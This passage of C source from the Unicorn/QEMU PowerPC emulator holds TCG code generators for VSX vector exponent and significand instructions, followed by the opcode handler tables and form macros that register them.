tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); tcg_gen_deposit_i64(tcg_ctx, xth, t0, xbh, 0, 48); set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); tcg_gen_mov_i64(tcg_ctx, xtl, xbl); set_cpu_vsrl(tcg_ctx, rD(ctx->opcode) + 32, xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, exp); tcg_temp_free_i64(tcg_ctx, zr); tcg_temp_free_i64(tcg_ctx, nan); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } #endif static void gen_xviexpsp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xah; TCGv_i64 xal; TCGv_i64 xbh; TCGv_i64 xbl; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xah = tcg_temp_new_i64(tcg_ctx); xal = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xah, xA(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xal, xA(ctx->opcode)); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, xth, xah, 0x807FFFFF807FFFFF); 
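/*
 * Annotation (added for clarity): each 64-bit half of the VSR holds
 * two packed single-precision words.  The mask 0x807FFFFF807FFFFF
 * keeps the sign (bit 31) and 23-bit fraction of both words from
 * (x)A, while the two 8-bit exponents supplied by (x)B sit in bits
 * 7:0 and 39:32, are isolated with 0xFF000000FF, and are shifted left
 * by 23 into the exponent fields (bits 30:23 of each word) before
 * being ORed in.
 */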
tcg_gen_andi_i64(tcg_ctx, t0, xbh, 0xFF000000FF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 23); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_andi_i64(tcg_ctx, xtl, xal, 0x807FFFFF807FFFFF); tcg_gen_andi_i64(tcg_ctx, t0, xbl, 0xFF000000FF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 23); tcg_gen_or_i64(tcg_ctx, xtl, xtl, t0); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xah); tcg_temp_free_i64(tcg_ctx, xal); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xviexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xah; TCGv_i64 xal; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xah = tcg_temp_new_i64(tcg_ctx); xal = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xah, xA(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xal, xA(ctx->opcode)); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, xth, xah, xbh, 52, 11); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_deposit_i64(tcg_ctx, xtl, xal, xbl, 52, 11); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xah); tcg_temp_free_i64(tcg_ctx, xal); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xvxexpsp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, xth, xbh, 23); tcg_gen_andi_i64(tcg_ctx, xth, xth, 0xFF000000FF); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_shri_i64(tcg_ctx, xtl, xbl, 23); tcg_gen_andi_i64(tcg_ctx, xtl, xtl, 0xFF000000FF); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xvxexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_extract_i64(tcg_ctx, xth, xbh, 52, 11); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_extract_i64(tcg_ctx, xtl, xbl, 52, 11); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } GEN_VSX_HELPER_X2(xvxsigsp, 0x00, 0x04, 0, PPC2_ISA300) static void gen_xvxsigdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; TCGv_i64 t0, zr, nan, exp; if (unlikely(!ctx->vsx_enabled)) { 
gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); exp = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); zr = tcg_const_i64(tcg_ctx, 0); nan = tcg_const_i64(tcg_ctx, 2047); tcg_gen_extract_i64(tcg_ctx, exp, xbh, 52, 11); tcg_gen_movi_i64(tcg_ctx, t0, 0x0010000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); tcg_gen_deposit_i64(tcg_ctx, xth, t0, xbh, 0, 52); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_extract_i64(tcg_ctx, exp, xbl, 52, 11); tcg_gen_movi_i64(tcg_ctx, t0, 0x0010000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); tcg_gen_deposit_i64(tcg_ctx, xtl, t0, xbl, 0, 52); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, exp); tcg_temp_free_i64(tcg_ctx, zr); tcg_temp_free_i64(tcg_ctx, nan); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } #undef GEN_XX2FORM #undef GEN_XX3FORM #undef GEN_XX2IFORM #undef GEN_XX3_RC_FORM #undef GEN_XX3FORM_DM #undef VSX_LOGICAL

unicorn-2.1.1/qemu/target/ppc/translate/vsx-ops.inc.c

GEN_HANDLER_E(lxsdx, 0x1F, 0x0C, 0x12, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxsiwax, 0x1F, 0x0C, 0x02, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(lxsiwzx, 0x1F, 0x0C, 0x00, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(lxsibzx, 0x1F, 0x0D, 0x18, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxsihzx, 0x1F, 0x0D, 0x19, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxsspx, 0x1F, 0x0C, 0x10, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(lxvd2x, 0x1F, 0x0C, 0x1A, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxvdsx, 0x1F, 0x0C, 0x0A, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxvw4x, 0x1F, 0x0C, 0x18, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxvh8x, 0x1F, 0x0C, 0x19, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxvb16x, 0x1F, 0x0C, 0x1B, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxvx, 0x1F, 0x0C, 0x08, 0x00000040, PPC_NONE, PPC2_ISA300), #if defined(TARGET_PPC64) GEN_HANDLER_E(lxvl, 0x1F, 0x0D, 0x08, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxvll, 0x1F, 0x0D, 0x09, 0, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER_E(stxsdx, 0x1F, 0xC, 0x16, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(stxsibx, 0x1F, 0xD, 0x1C, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxsihx, 0x1F, 0xD, 0x1D, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxsiwx, 0x1F, 0xC, 0x04, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(stxsspx, 0x1F, 0xC, 0x14, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(stxvd2x, 0x1F, 0xC, 0x1E, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(stxvw4x, 0x1F, 0xC, 0x1C, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(stxvh8x, 0x1F, 0x0C, 0x1D, 0, PPC_NONE,
PPC2_ISA300), GEN_HANDLER_E(stxvb16x, 0x1F, 0x0C, 0x1F, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxvx, 0x1F, 0x0C, 0x0C, 0, PPC_NONE, PPC2_ISA300), #if defined(TARGET_PPC64) GEN_HANDLER_E(stxvl, 0x1F, 0x0D, 0x0C, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxvll, 0x1F, 0x0D, 0x0D, 0, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER_E(mfvsrwz, 0x1F, 0x13, 0x03, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mtvsrwa, 0x1F, 0x13, 0x06, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mtvsrwz, 0x1F, 0x13, 0x07, 0x0000F800, PPC_NONE, PPC2_VSX207), #if defined(TARGET_PPC64) GEN_HANDLER_E(mfvsrd, 0x1F, 0x13, 0x01, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mtvsrd, 0x1F, 0x13, 0x05, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mfvsrld, 0X1F, 0x13, 0x09, 0x0000F800, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(mtvsrdd, 0X1F, 0x13, 0x0D, 0x0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(mtvsrws, 0x1F, 0x13, 0x0C, 0x0000F800, PPC_NONE, PPC2_ISA300), #endif #define GEN_XX1FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2) #define GEN_XX2FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2) #define GEN_XX2FORM_EXT(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0x00100000, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0x00100000, PPC_NONE, fl2) #define GEN_XX2FORM_EO(name, opc2, opc3, opc4, fl2) \ GEN_HANDLER2_E_2(name, #name, 0x3C, opc2 | 0, opc3, opc4, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E_2(name, #name, 0x3C, opc2 | 1, opc3, opc4, 0, PPC_NONE, fl2) #define GEN_XX3FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 2, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 3, opc3, 0, PPC_NONE, fl2) #define GEN_XX3FORM_NAME(name, opcname, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 2, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 3, opc3, 0, PPC_NONE, fl2) #define GEN_XX2IFORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 1, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 1, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 2, opc3, 1, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 3, opc3, 1, PPC_NONE, fl2) #define GEN_XX3_RC_FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x00, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x01, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x02, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x03, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x00, opc3 | 0x10, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x01, opc3 | 0x10, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x02, opc3 | 0x10, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x03, opc3 | 0x10, 0, PPC_NONE, fl2) #define GEN_XX3FORM_DM(name, opc2, opc3) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x00, 0, PPC_NONE, 
PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x0C, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x0C, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x0C, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x0C, 0, PPC_NONE, PPC2_VSX) #define GEN_VSX_XFORM_300(name, opc2, opc3, inval) \ GEN_HANDLER_E(name, 0x3F, opc2, opc3, inval, PPC_NONE, PPC2_ISA300) #define GEN_VSX_XFORM_300_EO(name, opc2, opc3, opc4, inval) \ GEN_HANDLER_E_2(name, 0x3F, opc2, opc3, opc4, inval, PPC_NONE, PPC2_ISA300) #define GEN_VSX_Z23FORM_300(name, opc2, opc3, opc4, inval) \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x00, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x08, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x10, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x18, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x00, opc4 | 0x1, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x08, opc4 | 0x1, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x10, opc4 | 0x1, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x18, opc4 | 0x1, inval) GEN_VSX_Z23FORM_300(xsrqpi, 0x05, 0x0, 0x0, 0x0), GEN_VSX_Z23FORM_300(xsrqpxp, 0x05, 0x1, 0x0, 0x0), GEN_VSX_XFORM_300_EO(xssqrtqp, 0x04, 0x19, 0x1B, 0x0), GEN_VSX_XFORM_300(xssubqp, 0x04, 0x10, 0x0), GEN_XX2FORM(xsabsdp, 0x12, 0x15, PPC2_VSX), GEN_XX2FORM(xsnabsdp, 0x12, 0x16, PPC2_VSX), GEN_XX2FORM(xsnegdp, 0x12, 0x17, PPC2_VSX), GEN_XX3FORM(xscpsgndp, 0x00, 0x16, PPC2_VSX), GEN_VSX_XFORM_300_EO(xsabsqp, 0x04, 0x19, 0x00, 0x00000001), GEN_VSX_XFORM_300_EO(xsnabsqp, 0x04, 0x19, 0x08, 0x00000001), GEN_VSX_XFORM_300_EO(xsnegqp, 0x04, 0x19, 0x10, 0x00000001), GEN_VSX_XFORM_300(xscpsgnqp, 0x04, 0x03, 0x00000001), GEN_VSX_XFORM_300_EO(xscvdpqp, 0x04, 0x1A, 0x16, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpdp, 0x04, 0x1A, 0x14, 0x0), GEN_VSX_XFORM_300_EO(xscvqpsdz, 0x04, 0x1A, 0x19, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpswz, 0x04, 0x1A, 0x09, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpudz, 0x04, 0x1A, 0x11, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpuwz, 0x04, 0x1A, 0x01, 0x00000001), #ifdef TARGET_PPC64 GEN_XX2FORM_EO(xsxexpdp, 0x16, 0x15, 0x00, PPC2_ISA300), GEN_VSX_XFORM_300_EO(xsxexpqp, 0x04, 0x19, 0x02, 0x00000001), GEN_XX2FORM_EO(xsxsigdp, 0x16, 0x15, 0x01, PPC2_ISA300), GEN_VSX_XFORM_300_EO(xsxsigqp, 0x04, 0x19, 0x12, 0x00000001), GEN_HANDLER_E(xsiexpdp, 0x3C, 0x16, 0x1C, 0, PPC_NONE, PPC2_ISA300), GEN_VSX_XFORM_300(xsiexpqp, 0x4, 0x1B, 0x00000001), #endif GEN_XX2FORM(xststdcdp, 0x14, 0x16, PPC2_ISA300), GEN_XX2FORM(xststdcsp, 0x14, 0x12, 
PPC2_ISA300), GEN_VSX_XFORM_300(xststdcqp, 0x04, 0x16, 0x00000001), GEN_XX3FORM(xviexpsp, 0x00, 0x1B, PPC2_ISA300), GEN_XX3FORM(xviexpdp, 0x00, 0x1F, PPC2_ISA300), GEN_XX2FORM_EO(xvxexpdp, 0x16, 0x1D, 0x00, PPC2_ISA300), GEN_XX2FORM_EO(xvxsigdp, 0x16, 0x1D, 0x01, PPC2_ISA300), GEN_XX2FORM_EO(xvxexpsp, 0x16, 0x1D, 0x08, PPC2_ISA300), GEN_XX2FORM_EO(xvxsigsp, 0x16, 0x1D, 0x09, PPC2_ISA300), /* DCMX = bit[25] << 6 | bit[29] << 5 | bit[11:15] */ #define GEN_XX2FORM_DCMX(name, opc2, opc3, fl2) \ GEN_XX3FORM(name, opc2, opc3 | 0, fl2), \ GEN_XX3FORM(name, opc2, opc3 | 1, fl2) GEN_XX2FORM_DCMX(xvtstdcdp, 0x14, 0x1E, PPC2_ISA300), GEN_XX2FORM_DCMX(xvtstdcsp, 0x14, 0x1A, PPC2_ISA300), GEN_XX2FORM(xvabsdp, 0x12, 0x1D, PPC2_VSX), GEN_XX2FORM(xvnabsdp, 0x12, 0x1E, PPC2_VSX), GEN_XX2FORM(xvnegdp, 0x12, 0x1F, PPC2_VSX), GEN_XX3FORM(xvcpsgndp, 0x00, 0x1E, PPC2_VSX), GEN_XX2FORM(xvabssp, 0x12, 0x19, PPC2_VSX), GEN_XX2FORM(xvnabssp, 0x12, 0x1A, PPC2_VSX), GEN_XX2FORM(xvnegsp, 0x12, 0x1B, PPC2_VSX), GEN_XX3FORM(xvcpsgnsp, 0x00, 0x1A, PPC2_VSX), GEN_XX3FORM(xsadddp, 0x00, 0x04, PPC2_VSX), GEN_VSX_XFORM_300(xsaddqp, 0x04, 0x00, 0x0), GEN_XX3FORM(xssubdp, 0x00, 0x05, PPC2_VSX), GEN_XX3FORM(xsmuldp, 0x00, 0x06, PPC2_VSX), GEN_VSX_XFORM_300(xsmulqp, 0x04, 0x01, 0x0), GEN_XX3FORM(xsdivdp, 0x00, 0x07, PPC2_VSX), GEN_XX2FORM(xsredp, 0x14, 0x05, PPC2_VSX), GEN_XX2FORM(xssqrtdp, 0x16, 0x04, PPC2_VSX), GEN_XX2FORM(xsrsqrtedp, 0x14, 0x04, PPC2_VSX), GEN_XX3FORM(xstdivdp, 0x14, 0x07, PPC2_VSX), GEN_XX2FORM(xstsqrtdp, 0x14, 0x06, PPC2_VSX), GEN_XX3FORM_NAME(xsmadddp, "xsmaddadp", 0x04, 0x04, PPC2_VSX), GEN_XX3FORM_NAME(xsmadddp, "xsmaddmdp", 0x04, 0x05, PPC2_VSX), GEN_XX3FORM_NAME(xsmsubdp, "xsmsubadp", 0x04, 0x06, PPC2_VSX), GEN_XX3FORM_NAME(xsmsubdp, "xsmsubmdp", 0x04, 0x07, PPC2_VSX), GEN_XX3FORM_NAME(xsnmadddp, "xsnmaddadp", 0x04, 0x14, PPC2_VSX), GEN_XX3FORM_NAME(xsnmadddp, "xsnmaddmdp", 0x04, 0x15, PPC2_VSX), GEN_XX3FORM_NAME(xsnmsubdp, "xsnmsubadp", 0x04, 0x16, PPC2_VSX), GEN_XX3FORM_NAME(xsnmsubdp, "xsnmsubmdp", 0x04, 0x17, PPC2_VSX), GEN_XX3FORM(xscmpeqdp, 0x0C, 0x00, PPC2_ISA300), GEN_XX3FORM(xscmpgtdp, 0x0C, 0x01, PPC2_ISA300), GEN_XX3FORM(xscmpgedp, 0x0C, 0x02, PPC2_ISA300), GEN_XX3FORM(xscmpnedp, 0x0C, 0x03, PPC2_ISA300), GEN_XX3FORM(xscmpexpdp, 0x0C, 0x07, PPC2_ISA300), GEN_VSX_XFORM_300(xscmpexpqp, 0x04, 0x05, 0x00600001), GEN_XX2IFORM(xscmpodp, 0x0C, 0x05, PPC2_VSX), GEN_XX2IFORM(xscmpudp, 0x0C, 0x04, PPC2_VSX), GEN_VSX_XFORM_300(xscmpoqp, 0x04, 0x04, 0x00600001), GEN_VSX_XFORM_300(xscmpuqp, 0x04, 0x14, 0x00600001), GEN_XX3FORM(xsmaxdp, 0x00, 0x14, PPC2_VSX), GEN_XX3FORM(xsmindp, 0x00, 0x15, PPC2_VSX), GEN_XX3FORM(xsmaxcdp, 0x00, 0x10, PPC2_ISA300), GEN_XX3FORM(xsmincdp, 0x00, 0x11, PPC2_ISA300), GEN_XX3FORM(xsmaxjdp, 0x00, 0x12, PPC2_ISA300), GEN_XX3FORM(xsminjdp, 0x00, 0x13, PPC2_ISA300), GEN_XX2FORM_EO(xscvdphp, 0x16, 0x15, 0x11, PPC2_ISA300), GEN_XX2FORM(xscvdpsp, 0x12, 0x10, PPC2_VSX), GEN_XX2FORM(xscvdpspn, 0x16, 0x10, PPC2_VSX207), GEN_XX2FORM_EO(xscvhpdp, 0x16, 0x15, 0x10, PPC2_ISA300), GEN_VSX_XFORM_300_EO(xscvsdqp, 0x04, 0x1A, 0x0A, 0x00000001), GEN_XX2FORM(xscvspdp, 0x12, 0x14, PPC2_VSX), GEN_XX2FORM(xscvspdpn, 0x16, 0x14, PPC2_VSX207), GEN_XX2FORM(xscvdpsxds, 0x10, 0x15, PPC2_VSX), GEN_XX2FORM(xscvdpsxws, 0x10, 0x05, PPC2_VSX), GEN_XX2FORM(xscvdpuxds, 0x10, 0x14, PPC2_VSX), GEN_XX2FORM(xscvdpuxws, 0x10, 0x04, PPC2_VSX), GEN_XX2FORM(xscvsxddp, 0x10, 0x17, PPC2_VSX), GEN_VSX_XFORM_300_EO(xscvudqp, 0x04, 0x1A, 0x02, 0x00000001), GEN_XX2FORM(xscvuxddp, 0x10, 0x16, PPC2_VSX), GEN_XX2FORM(xsrdpi, 
0x12, 0x04, PPC2_VSX), GEN_XX2FORM(xsrdpic, 0x16, 0x06, PPC2_VSX), GEN_XX2FORM(xsrdpim, 0x12, 0x07, PPC2_VSX), GEN_XX2FORM(xsrdpip, 0x12, 0x06, PPC2_VSX), GEN_XX2FORM(xsrdpiz, 0x12, 0x05, PPC2_VSX), GEN_XX3FORM(xsaddsp, 0x00, 0x00, PPC2_VSX207), GEN_XX3FORM(xssubsp, 0x00, 0x01, PPC2_VSX207), GEN_XX3FORM(xsmulsp, 0x00, 0x02, PPC2_VSX207), GEN_XX3FORM(xsdivsp, 0x00, 0x03, PPC2_VSX207), GEN_VSX_XFORM_300(xsdivqp, 0x04, 0x11, 0x0), GEN_XX2FORM(xsresp, 0x14, 0x01, PPC2_VSX207), GEN_XX2FORM(xsrsp, 0x12, 0x11, PPC2_VSX207), GEN_XX2FORM(xssqrtsp, 0x16, 0x00, PPC2_VSX207), GEN_XX2FORM(xsrsqrtesp, 0x14, 0x00, PPC2_VSX207), GEN_XX3FORM_NAME(xsmaddsp, "xsmaddasp", 0x04, 0x00, PPC2_VSX207), GEN_XX3FORM_NAME(xsmaddsp, "xsmaddmsp", 0x04, 0x01, PPC2_VSX207), GEN_XX3FORM_NAME(xsmsubsp, "xsmsubasp", 0x04, 0x02, PPC2_VSX207), 